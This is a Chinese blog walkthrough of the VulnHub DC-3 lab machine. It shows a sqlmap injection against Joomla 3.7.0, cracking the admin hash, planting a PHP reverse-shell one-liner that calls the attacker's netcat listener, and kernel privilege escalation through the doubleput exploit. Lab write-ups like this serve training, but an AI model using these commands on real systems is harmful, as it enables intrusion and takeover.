<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="theme-color" content="#0078E7"><meta name="author" content="Nayst"><meta name="copyright" content="Nayst"><meta name="generator" content="Hexo 6.2.0"><meta name="theme" content="hexo-theme-yun"><title>VulnHub-DC-3 | Nayst-Blog</title><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Noto+Serif+SC:wght@900&amp;display=swap" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://fastly.jsdelivr.net/npm/star-markdown-css@0.3.3/dist/yun/yun-markdown.min.css"><link rel="stylesheet" href="https://fastly.jsdelivr.net/npm/prism-theme-vars/base.css"><script src="https://fastly.jsdelivr.net/npm/scrollreveal/dist/scrollreveal.min.js" defer></script><script>function initScrollReveal() {
  [".post-card",".markdown-body img"].forEach((target)=> {
    ScrollReveal().reveal(target);
  })
}
document.addEventListener("DOMContentLoaded", initScrollReveal);
document.addEventListener("pjax:success", initScrollReveal);
</script><link rel="icon" type="image/svg+xml" href="/images/Doge.svg"><link rel="mask-icon" href="/images/Doge.svg" color="#0078E7"><link rel="preload" href="/css/hexo-theme-yun.css" as="style"><link rel="prefetch" href="/js/sidebar.js" as="script"><link rel="preconnect" href="https://cdn.jsdelivr.net" crossorigin><link rel="preconnect" href="https://fastly.jsdelivr.net/npm/" crossorigin><script id="yun-config">
    window.Yun = {}
    window.CONFIG = {"hostname":"www.nayst.top","root":"/","title":["Nayst","的","小","站"],"version":"1.10.6","mode":"auto","copycode":true,"page":{"isPost":true},"i18n":{"placeholder":"搜索...","empty":"找不到您查询的内容: ${query}","hits":"找到 ${hits} 条结果","hits_time":"找到 ${hits} 条结果（用时 ${time} 毫秒）"},"anonymous_image":"https://cdn.yunyoujun.cn/img/avatar/none.jpg","say":{"api":"https://el-bot-api.vercel.app/api/words/young"},"local_search":{"path":"/search.xml"},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"fireworks":{"colors":null},"vendors":{"host":"https://fastly.jsdelivr.net/npm/","darken":"https://fastly.jsdelivr.net/npm/darken@1.5.0"}};
  </script><link rel="stylesheet" href="/css/hexo-theme-yun.css"><script src="/js/hexo-theme-yun.js" type="module"></script><meta name="description" content="介绍在VMware中搭建环境，网络选择NAT或者桥接，确保攻击机和靶机在同一网络下即可，我这里选择的NAT。 靶机：192.168.254.131（DC-3） 攻击机：192.168.254.128（Kali） 物理机：192.168.254.1（Windows10） 信息搜集网络扫描先扫描靶机IP及开启的服务 $ nmap -sn 192.168.254.1&#x2F;24    进一步扫描靶机开启的服务">
<meta property="og:type" content="article">
<meta property="og:title" content="VulnHub-DC-3">
<meta property="og:url" content="https://www.nayst.top/2022/04/09/VulnHub-DC-3/index.html">
<meta property="og:site_name" content="Nayst-Blog">
<meta property="og:description" content="介绍在VMware中搭建环境，网络选择NAT或者桥接，确保攻击机和靶机在同一网络下即可，我这里选择的NAT。 靶机：192.168.254.131（DC-3） 攻击机：192.168.254.128（Kali） 物理机：192.168.254.1（Windows10） 信息搜集网络扫描先扫描靶机IP及开启的服务 $ nmap -sn 192.168.254.1&#x2F;24    进一步扫描靶机开启的服务">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://www.nayst.top/2022/04/09/VulnHub-DC-3/image-20220407183225720.png">
<meta property="og:image" content="https://www.nayst.top/2022/04/09/VulnHub-DC-3/image-20220407183255285.png">
<meta property="og:image" content="https://www.nayst.top/2022/04/09/VulnHub-DC-3/image-20220407183420439.png">
<meta property="og:image" content="https://www.nayst.top/2022/04/09/VulnHub-DC-3/image-20220407184554357.png">
<meta property="og:image" content="https://www.nayst.top/2022/04/09/VulnHub-DC-3/image-20220407184805436.png">
<meta property="og:image" content="https://www.nayst.top/2022/04/09/VulnHub-DC-3/image-20220407184958715.png">
<meta property="og:image" content="https://www.nayst.top/2022/04/09/VulnHub-DC-3/image-20220407185216267.png">
<meta property="og:image" content="https://www.nayst.top/2022/04/09/VulnHub-DC-3/image-20220407185854214.png">
<meta property="og:image" content="https://www.nayst.top/2022/04/09/VulnHub-DC-3/image-20220407201240425.png">
<meta property="og:image" content="https://www.nayst.top/2022/04/09/VulnHub-DC-3/image-20220407203244703.png">
<meta property="og:image" content="https://www.nayst.top/2022/04/09/VulnHub-DC-3/image-20220407203441928.png">
<meta property="og:image" content="https://www.nayst.top/2022/04/09/VulnHub-DC-3/image-20220407203504799.png">
<meta property="og:image" content="https://www.nayst.top/2022/04/09/VulnHub-DC-3/image-20220407203532117.png">
<meta property="og:image" content="https://www.nayst.top/2022/04/09/VulnHub-DC-3/image-20220407211946282.png">
<meta property="og:image" content="https://www.nayst.top/2022/04/09/VulnHub-DC-3/image-20220407212035963.png">
<meta property="og:image" content="https://www.nayst.top/2022/04/09/VulnHub-DC-3/image-20220407204825629.png">
<meta property="og:image" content="https://www.nayst.top/2022/04/09/VulnHub-DC-3/image-20220407204915535.png">
<meta property="og:image" content="https://www.nayst.top/2022/04/09/VulnHub-DC-3/image-20220407205101911.png">
<meta property="og:image" content="https://www.nayst.top/2022/04/09/VulnHub-DC-3/image-20220407205242393.png">
<meta property="og:image" content="https://www.nayst.top/2022/04/09/VulnHub-DC-3/image-20220407205743565.png">
<meta property="og:image" content="https://www.nayst.top/2022/04/09/VulnHub-DC-3/image-20220407212348514.png">
<meta property="og:image" content="https://www.nayst.top/2022/04/09/VulnHub-DC-3/image-20220407212425364.png">
<meta property="article:published_time" content="2022-04-09T03:06:22.000Z">
<meta property="article:modified_time" content="2022-07-31T08:46:12.507Z">
<meta property="article:author" content="Nayst">
<meta property="article:tag" content="靶场">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://www.nayst.top/2022/04/09/VulnHub-DC-3/image-20220407183225720.png"><script>(function() {
  const prefersDark = window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches
  const setting = localStorage.getItem('darken-mode') || 'auto'
  if (setting === 'dark' || (prefersDark && setting !== 'light'))
    document.documentElement.classList.toggle('dark', true)
})()</script></head><body><script src="https://code.iconify.design/2/2.1.1/iconify.min.js"></script><script>// Define global variable
IconifyProviders = {
  // Empty prefix: overwrite default API provider configuration
  '': {
    // Use custom API first, use Iconify public API as backup
    resources: [
        'https://api.iconify.design',
    ],
    // Wait for 1 second before switching API hosts
    rotate: 1000,
  },
};</script><script defer src="https://fastly.jsdelivr.net/npm/animejs@latest"></script><script defer src="/js/ui/fireworks.js" type="module"></script><canvas class="fireworks"></canvas><div class="container"><a class="sidebar-toggle hty-icon-button" id="menu-btn"><div class="hamburger hamburger--spin" type="button"><span class="hamburger-box"><span class="hamburger-inner"></span></span></div></a><div class="sidebar-toggle sidebar-overlay"></div><aside class="sidebar"><script src="/js/sidebar.js" type="module"></script><ul class="sidebar-nav"><li class="sidebar-nav-item sidebar-nav-toc hty-icon-button sidebar-nav-active" data-target="post-toc-wrap" title="文章目录"><span class="icon iconify" data-icon="ri:list-ordered"></span></li><li class="sidebar-nav-item sidebar-nav-overview hty-icon-button" data-target="site-overview-wrap" title="站点概览"><span class="icon iconify" data-icon="ri:passport-line"></span></li></ul><div class="sidebar-panel" id="site-overview-wrap"><div class="site-info fix-top"><a class="site-author-avatar" href="/about/" title="Nayst"><img width="96" loading="lazy" src="/images/kakashi.png" alt="Nayst"><span class="site-author-status" title="努力做一个对社会有贡献的人">🤣</span></a><div class="site-author-name"><a href="/about/">Nayst</a></div><span class="site-name">Nayst-Blog</span><sub class="site-subtitle">远离舒适圈</sub><div class="site-description">已入江湖，未配良剑</div></div><nav class="site-state"><a class="site-state-item hty-icon-button icon-home" href="/" title="首页"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:home-4-line"></span></span></a><div class="site-state-item"><a href="/archives/" title="归档"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:archive-line"></span></span><span class="site-state-item-count">17</span></a></div><div class="site-state-item"><a href="/categories/" title="分类"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:folder-2-line"></span></span><span class="site-state-item-count">4</span></a></div><div class="site-state-item"><a href="/tags/" title="标签"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:price-tag-3-line"></span></span><span class="site-state-item-count">6</span></a></div><a class="site-state-item hty-icon-button" target="_blank" rel="noopener" href="https://yun.yunyoujun.cn" title="文档"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:settings-line"></span></span></a></nav><hr style="margin-bottom:0.5rem"><div class="links-of-author"><a class="links-of-author-item hty-icon-button" rel="noopener" title="2495582918" target="_blank" style="color:#007722"><span class="icon iconify" data-icon="ri:qq-line"></span></a><a class="links-of-author-item hty-icon-button" rel="noopener" title="y1049843745" target="_blank" style="color:#1AAD19"><span class="icon iconify" data-icon="ri:wechat-line"></span></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://github.com/N4YST" title="GitHub" target="_blank" style="color:#6e5494"><span class="icon iconify" data-icon="ri:github-line"></span></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://space.bilibili.com/1579790" title="哔哩哔哩" target="_blank" style="color:#FF8EB3"><span class="icon iconify" data-icon="ri:bilibili-line"></span></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://weibo.com/jizhideyunyoujun" title="微博" target="_blank" style="color:#E6162D"><span class="icon iconify" data-icon="ri:weibo-line"></span></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://music.163.com/#/user/home?id=277777144" title="网易云音乐" target="_blank" style="color:#C20C0C"><span class="icon iconify" data-icon="ri:netease-cloud-music-line"></span></a></div><hr style="margin:0.5rem 1rem"><div class="links"><a class="links-item hty-icon-button" href="/links/" title="我的小伙伴们" style="color:dodgerblue"><span class="icon iconify" data-icon="ri:genderless-line"></span></a><a class="links-item hty-icon-button" href="/girls/" title="我的老婆们" style="color:pink"><span class="icon iconify" data-icon="ri:women-line"></span></a></div><br><a class="links-item hty-icon-button" id="toggle-mode-btn" href="javascript:;" title="Mode" style="color: #f1cb64"><span class="icon iconify" data-icon="ri:contrast-2-line"></span></a></div><div class="sidebar-panel sidebar-panel-active" id="post-toc-wrap"><div class="post-toc"><div class="post-toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BB%8B%E7%BB%8D"><span class="toc-number">1.</span> <span class="toc-text">介绍</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86"><span class="toc-number">2.</span> <span class="toc-text">信息搜集</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%BD%91%E7%BB%9C%E6%89%AB%E6%8F%8F"><span class="toc-number">2.1.</span> <span class="toc-text">网络扫描</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9F%A5%E7%9C%8B%E7%BD%91%E7%AB%99%E7%9B%B8%E5%85%B3%E4%BF%A1%E6%81%AF"><span class="toc-number">2.2.</span> <span class="toc-text">查看网站相关信息</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F%E5%8F%8A%E5%88%A9%E7%94%A8"><span class="toc-number">3.</span> <span class="toc-text">漏洞扫描及利用</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F"><span class="toc-number">3.1.</span> <span class="toc-text">漏洞扫描</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-number">3.2.</span> <span class="toc-text">漏洞利用</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#flag"><span class="toc-number">4.</span> <span class="toc-text">flag</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#flag-1"><span class="toc-number">4.1.</span> <span class="toc-text">flag</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-number">5.</span> <span class="toc-text">总结</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AD%A6%E5%88%B0%E7%9A%84%E7%9F%A5%E8%AF%86"><span class="toc-number">5.1.</span> <span class="toc-text">学到的知识</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E8%80%83"><span class="toc-number">5.2.</span> <span class="toc-text">参考</span></a></li></ol></li></ol></div></div></div></aside><main class="sidebar-translate" id="content"><div id="post"><article class="hty-card post-block" itemscope itemtype="https://schema.org/Article" style="--smc-primary:#0078E7;"><link itemprop="mainEntityOfPage" href="https://www.nayst.top/2022/04/09/VulnHub-DC-3/"><span hidden itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Nayst"><meta itemprop="description"></span><span hidden itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><meta itemprop="name" content="Nayst-Blog"></span><header class="post-header"><h1 class="post-title" itemprop="name headline">VulnHub-DC-3</h1><div class="post-meta"><div class="post-time" style="display:block"><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:calendar-line"></span></span> <time title="创建时间：2022-04-09 11:06:22" itemprop="dateCreated datePublished" datetime="2022-04-09T11:06:22+08:00">2022-04-09</time><span class="post-meta-divider">-</span><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:calendar-2-line"></span></span> <time title="修改时间：2022-07-31 16:46:12" itemprop="dateModified" datetime="2022-07-31T16:46:12+08:00">2022-07-31</time></div><span class="post-count"><span class="post-symbolcount"><span class="post-meta-item-icon" title="本文字数"><span class="icon iconify" data-icon="ri:file-word-line"></span></span> <span title="本文字数">838</span><span class="post-meta-divider">-</span><span class="post-meta-item-icon" title="阅读时长"><span class="icon iconify" data-icon="ri:timer-line"></span></span> <span title="阅读时长">3m</span></span></span><div class="post-classify"><span class="post-category"> <span class="post-meta-item-icon" style="margin-right:3px;"><span class="icon iconify" data-icon="ri:folder-line"></span></span><span itemprop="about" itemscope itemtype="https://schema.org/Thing"><a class="category-item" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" style="--text-color:var(--hty-text-color)" itemprop="url" rel="index"><span itemprop="text">渗透测试</span></a></span></span><span class="post-tag"><span class="post-meta-divider">-</span><a class="tag-item" href="/tags/%E9%9D%B6%E5%9C%BA/" style="--text-color:var(--hty-text-color)"><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:price-tag-3-line"></span></span><span class="tag-name">靶场</span></a></span></div></div></header><section class="post-body" itemprop="articleBody"><div class="post-content markdown-body"><h1 id="介绍"><a href="#介绍" class="headerlink" title="介绍"></a>介绍</h1><p>在VMware中搭建环境，网络选择NAT或者桥接，确保攻击机和靶机在同一网络下即可，我这里选择的NAT。</p>
<p>靶机：192.168.254.131（<a target="_blank" rel="noopener" href="https://www.vulnhub.com/entry/dc-32,312/">DC-3</a>）</p>
<p>攻击机：192.168.254.128（Kali）</p>
<p>物理机：192.168.254.1（Windows10）</p>
<h1 id="信息搜集"><a href="#信息搜集" class="headerlink" title="信息搜集"></a>信息搜集</h1><h2 id="网络扫描"><a href="#网络扫描" class="headerlink" title="网络扫描"></a>网络扫描</h2><p>先扫描靶机IP及开启的服务</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">$ nmap -sn <span class="token number">192.168</span>.254.1/24</code></pre>

<img src="/2022/04/09/VulnHub-DC-3/image-20220407183225720.png" class="" title="image-20220407183225720" loading="lazy">

<p>进一步扫描靶机开启的服务</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">$ nmap -sV -p- <span class="token number">192.168</span>.254.131</code></pre>

<img src="/2022/04/09/VulnHub-DC-3/image-20220407183255285.png" class="" title="image-20220407183255285" loading="lazy">

<p>目标靶机80端口存在httpd服务。</p>
<h2 id="查看网站相关信息"><a href="#查看网站相关信息" class="headerlink" title="查看网站相关信息"></a>查看网站相关信息</h2><p>打开站点，一个登录界面，使用插件<code>wappalyzer</code>查看网站的相关信息。</p>
<img src="/2022/04/09/VulnHub-DC-3/image-20220407183420439.png" class="" title="image-20220407183420439" loading="lazy">

<p>可以看到该网站使用CMS为<code>Joomla</code>。</p>
<h1 id="漏洞扫描及利用"><a href="#漏洞扫描及利用" class="headerlink" title="漏洞扫描及利用"></a>漏洞扫描及利用</h1><h2 id="漏洞扫描"><a href="#漏洞扫描" class="headerlink" title="漏洞扫描"></a>漏洞扫描</h2><p>在漏洞库中查询 Joomla 漏洞，首先查询版本。</p>
<p>获取版本号可以用joomla的专用扫描器 <code>joomscan</code>来扫描</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">$ joomscan -u <span class="token number">192.168</span>.254.131</code></pre>

<img src="/2022/04/09/VulnHub-DC-3/image-20220407184554357.png" class="" title="image-20220407184554357" loading="lazy">

<p>查询该版本的漏洞</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">$ searchsploit joomla <span class="token number">3.7</span>.0</code></pre>

<img src="/2022/04/09/VulnHub-DC-3/image-20220407184805436.png" class="" title="image-20220407184805436" loading="lazy">

<p>发现该版本存在SQL注入漏洞和跨站脚本漏洞。</p>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><p>查看SQL注入的信息，先复制到当前文件夹</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">$ searchsploit -m <span class="token number">42033</span>.txt
$ <span class="token function">cat</span> <span class="token number">42033</span>.txt</code></pre>

<img src="/2022/04/09/VulnHub-DC-3/image-20220407184958715.png" class="" title="image-20220407184958715" loading="lazy">

<p>这个文件里面都把利用命令给出来了，直接复制粘贴，然后修改一下IP地址即可使用。</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">sqlmap -u <span class="token string">"http://192.168.254.131/index.php?option=com_fields&amp;view=fields&amp;layout=modal&amp;list[fullordering]=updatexml"</span> --risk<span class="token operator">=</span><span class="token number">3</span> --level<span class="token operator">=</span><span class="token number">5</span> --random-agent --dbs -p list<span class="token punctuation">[</span>fullordering<span class="token punctuation">]</span></code></pre>

<img src="/2022/04/09/VulnHub-DC-3/image-20220407185216267.png" class="" title="image-20220407185216267" loading="lazy">

<p>测试可用，一把嗦。</p>
<p>库：<code>Joomla</code></p>
<p>表：<code>#__users</code></p>
<img src="/2022/04/09/VulnHub-DC-3/image-20220407185854214.png" class="" title="image-20220407185854214" loading="lazy">

<p>得到管理员密码。</p>
<h1 id="flag"><a href="#flag" class="headerlink" title="flag"></a>flag</h1><h2 id="flag-1"><a href="#flag-1" class="headerlink" title="flag"></a>flag</h2><p>拿到的管理员密码是密文，尝试用约翰开膛手破解。</p>
<p>把密文保存到文件中，开始破译。</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">$ <span class="token builtin class-name">echo</span> <span class="token string">'$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu'</span> <span class="token operator">></span> pass.txt
$ john pass.txt</code></pre>

<img src="/2022/04/09/VulnHub-DC-3/image-20220407201240425.png" class="" title="image-20220407201240425" loading="lazy">

<p>拿到密码：snoopy，成功登录后台。</p>
<blockquote>
<p>通过修改模块中的php文件，插入一句话木马，然后通过中国菜刀或weevely连接获取shell的方法。</p>
</blockquote>
<p>写一个反弹shell的木马。</p>
<pre class="language-bash" data-language="bash"><code class="language-bash"><span class="token operator">&lt;</span>?php system<span class="token punctuation">(</span><span class="token string">'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&amp;1|nc 192.168.254.128 1234 >/tmp/f'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>?<span class="token operator">></span></code></pre>

<p>上传木马</p>
<img src="/2022/04/09/VulnHub-DC-3/image-20220407203244703.png" class="" title="image-20220407203244703" loading="lazy">

<p>随便选择一个模板</p>
<img src="/2022/04/09/VulnHub-DC-3/image-20220407203441928.png" class="" title="image-20220407203441928" loading="lazy">

<p>新建文件</p>
<img src="/2022/04/09/VulnHub-DC-3/image-20220407203504799.png" class="" title="image-20220407203504799" loading="lazy">

<p>选择文件名和文件类型</p>
<img src="/2022/04/09/VulnHub-DC-3/image-20220407203532117.png" class="" title="image-20220407203532117" loading="lazy">

<p>将刚刚写的马复制过来，保存</p>
<img src="/2022/04/09/VulnHub-DC-3/image-20220407211946282.png" class="" title="image-20220407211946282" loading="lazy">

<p>监听1234端口</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">$ rlwrap <span class="token function">nc</span> -lvnp <span class="token number">1234</span></code></pre>

<p>访问木马，执行代码，成功反弹shell！</p>
<img src="/2022/04/09/VulnHub-DC-3/image-20220407212035963.png" class="" title="image-20220407212035963" loading="lazy">

<p>接下来就是提权了。</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">$ <span class="token function">find</span> / -perm -u<span class="token operator">=</span>s -type f <span class="token operator"><span class="token file-descriptor important">2</span>></span>/dev/null</code></pre>

<img src="/2022/04/09/VulnHub-DC-3/image-20220407204825629.png" class="" title="image-20220407204825629" loading="lazy">

<pre class="language-bash" data-language="bash"><code class="language-bash">$ <span class="token function">sudo</span> -l</code></pre>

<img src="/2022/04/09/VulnHub-DC-3/image-20220407204915535.png" class="" title="image-20220407204915535" loading="lazy">

<p>经过查找没有发现s权限的文件也没有发现可以用root权限执行的命令。</p>
<p>这种情况还是需要用searchsploit来查找提权漏洞。但是查找前需要知道系统的版本号和内核版本号。</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">$ <span class="token function">cat</span> /etc/issue	<span class="token comment">#查看系统版本号</span>
$ <span class="token function">uname</span> -a 			<span class="token comment">#查看内核版本号</span></code></pre>

<img src="/2022/04/09/VulnHub-DC-3/image-20220407205101911.png" class="" title="image-20220407205101911" loading="lazy">

<p>得知系统为 <code>ubuntu 16.04</code>，内核发行版本为 <code>4.4.0-21</code>。</p>
<p>查找相关漏洞</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">$ searchsploit ubuntu <span class="token number">16.04</span></code></pre>

<img src="/2022/04/09/VulnHub-DC-3/image-20220407205242393.png" class="" title="image-20220407205242393" loading="lazy">

<p>发现三个对应内核版本的漏洞。</p>
<p>三个都行，这里选择39772，复制payload后打开。</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">$ searchsploit -m <span class="token number">39773</span>.txt</code></pre>

<img src="/2022/04/09/VulnHub-DC-3/image-20220407205743565.png" class="" title="image-20220407205743565" loading="lazy">

<p>根据地址下载 zip 文件，解压后发现两个文件，将<code>exploit.tar</code>上传到靶机上，解压执行。</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">$ :file_upload2web exploit.tar		<span class="token comment">#上传文件到靶机</span>
$ <span class="token function">tar</span> -xvf exploit.tar  			<span class="token comment">#解压exploit提权脚本tar包</span>
$ <span class="token builtin class-name">cd</span> ebpf_mapfd_doubleput_exploit	
$ ./compile.sh   					<span class="token comment">#执行脚本，编译文件</span>
$ ./doubleput  						<span class="token comment">#执行提权文件</span></code></pre>

<img src="/2022/04/09/VulnHub-DC-3/image-20220407212348514.png" class="" title="image-20220407212348514" loading="lazy">

<p>成功拿到flag</p>
<img src="/2022/04/09/VulnHub-DC-3/image-20220407212425364.png" class="" title="image-20220407212425364" loading="lazy">

<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><h2 id="学到的知识"><a href="#学到的知识" class="headerlink" title="学到的知识"></a>学到的知识</h2><ol>
<li>searchsploit 查询漏洞。</li>
<li>约翰开膛手爆破加密后的密码。</li>
<li>利用 linux 内核漏洞提权。</li>
</ol>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p><a target="_blank" rel="noopener" href="https://blog.csdn.net/rpsate/article/details/119682569?spm=1001.2014.3001.5502">vulnhub DC3 靶场练习</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_43583637/article/details/101554815">Vulnhub靶机实战——DC-3</a></p>
</div></section><div id="reward-container"><span class="hty-icon-button button-glow" id="reward-button" title="打赏" onclick="var qr = document.getElementById(&quot;qr&quot;); qr.style.display = (qr.style.display === &quot;none&quot;) ? &quot;block&quot; : &quot;none&quot;;"><span class="icon iconify" data-icon="ri:hand-coin-line"></span></span><div id="reward-comment">竟然有用？！赏！</div><div id="qr" style="display:none;"><div style="display:inline-block"><a href="/images/Alipay.png"><img loading="lazy" src="/images/Alipay.png" alt="支付宝" title="支付宝"></a><div><span style="color:#00A3EE"><span class="icon iconify" data-icon="ri:alipay-line"></span></span></div></div><div style="display:inline-block"><a href="/images/WechatPay.png"><img loading="lazy" src="/images/WechatPay.png" alt="微信支付" title="微信支付"></a><div><span style="color:#2DC100"><span class="icon iconify" data-icon="ri:wechat-pay-line"></span></span></div></div></div></div><ul class="post-copyright"><li class="post-copyright-author"><strong>本文作者：</strong>Nayst</li><li class="post-copyright-link"><strong>本文链接：</strong><a href="https://www.nayst.top/2022/04/09/VulnHub-DC-3/" title="VulnHub-DC-3">https://www.nayst.top/2022/04/09/VulnHub-DC-3/</a></li><li class="post-copyright-license"><strong>版权声明：</strong>本博客所有文章除特别声明外，均默认采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank" rel="noopener" title="CC BY-NC-SA 4.0 "><span class="icon iconify" data-icon="ri:creative-commons-line"></span><span class="icon iconify" data-icon="ri:creative-commons-by-line"></span><span class="icon iconify" data-icon="ri:creative-commons-nc-line"></span><span class="icon iconify" data-icon="ri:creative-commons-sa-line"></span></a> 许可协议。</li></ul></article><div class="post-nav"><div class="post-nav-item"><a class="post-nav-prev" href="/2022/04/10/VulnHub-DC-4/" rel="prev" title="VulnHub-DC-4"><span class="icon iconify" data-icon="ri:arrow-left-s-line"></span><span class="post-nav-text">VulnHub-DC-4</span></a></div><div class="post-nav-item"><a class="post-nav-next" href="/2022/04/08/VulnHub-DC-2/" rel="next" title="VulnHub-DC-2"><span class="post-nav-text">VulnHub-DC-2</span><span class="icon iconify" data-icon="ri:arrow-right-s-line"></span></a></div></div></div><div class="hty-card" id="comment"></div></main><footer class="sidebar-translate" id="footer"><div class="copyright"><span>&copy; 2021 – 2022 </span><span class="with-love" id="animate"><span class="icon iconify" data-icon="ri:cloud-line"></span></span><span class="author"> Nayst</span></div><div class="powered"><span>由 <a href="https://hexo.io" target="_blank" rel="noopener">Hexo</a> 驱动 v6.2.0</span><span class="footer-separator">|</span><span>主题 - <a rel="noopener" href="https://github.com/YunYouJun/hexo-theme-yun" target="_blank"><span>Yun</span></a> v1.10.6</span></div><div class="live-time"><span>本博客已萌萌哒地运行</span><span id="display_live_time"></span><span class="moe-text">(●'◡'●)</span><script>function blog_live_time() {
  setTimeout(blog_live_time, 1000);
  const start = new Date('2021-07-01T18:00:00');
  const now = new Date();
  const timeDiff = (now.getTime() - start.getTime());
  const msPerMinute = 60 * 1000;
  const msPerHour = 60 * msPerMinute;
  const msPerDay = 24 * msPerHour;
  const passDay = Math.floor(timeDiff / msPerDay);
  const passHour = Math.floor((timeDiff % msPerDay) / 60 / 60 / 1000);
  const passMinute = Math.floor((timeDiff % msPerHour) / 60 / 1000);
  const passSecond = Math.floor((timeDiff % msPerMinute) / 1000);
  display_live_time.innerHTML = ` ${passDay} 天 ${passHour} 小时 ${passMinute} 分 ${passSecond} 秒`;
}
blog_live_time();
</script></div></footer></div><a class="hty-icon-button" id="back-to-top" aria-label="back-to-top" href="#"><span class="icon iconify" data-icon="ri:arrow-up-s-line"></span><svg class="progress-circle-container" viewBox="0 0 100 100"><circle class="progress-circle" id="progressCircle" cx="50" cy="50" r="48" fill="none" stroke="#0078E7" stroke-width="2" stroke-linecap="round"></circle></svg></a><a class="popup-trigger hty-icon-button icon-search" id="search" href="javascript:;" title="搜索"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:search-line"></span></span></a><script>window.addEventListener("DOMContentLoaded", () => {
  // Handle and trigger popup window
  document.querySelector(".popup-trigger").addEventListener("click", () => {
    document.querySelector(".popup").classList.add("show");
    setTimeout(() => {
      document.querySelector(".search-input").focus();
    }, 100);
  });

  // Monitor main search box
  const onPopupClose = () => {
    document.querySelector(".popup").classList.remove("show");
  };

  document.querySelector(".popup-btn-close").addEventListener("click", () => {
    onPopupClose();
  });

  window.addEventListener("keyup", event => {
    if (event.key === "Escape") {
      onPopupClose();
    }
  });
});
</script><script src="https://fastly.jsdelivr.net/npm/hexo-generator-searchdb@1.4.0/dist/search.js"></script><script src="/js/search/local-search.js" defer type="module"></script><div class="popup search-popup"><div class="search-header"><span class="popup-btn-close close-icon hty-icon-button"><span class="icon iconify" data-icon="ri:close-line"></span></span></div><div class="search-input-container"><input class="search-input" id="local-search-input" type="text" placeholder="搜索..." value=""></div><div class="search-result-container"></div></div><script src="https://fastly.jsdelivr.net/npm/medium-zoom@1.0.6/dist/medium-zoom.min.js"></script><script>const images = [...document.querySelectorAll('.markdown-body img')]
mediumZoom(images)</script><style>.medium-zoom-image {
  z-index: 99;
}</style></body></html>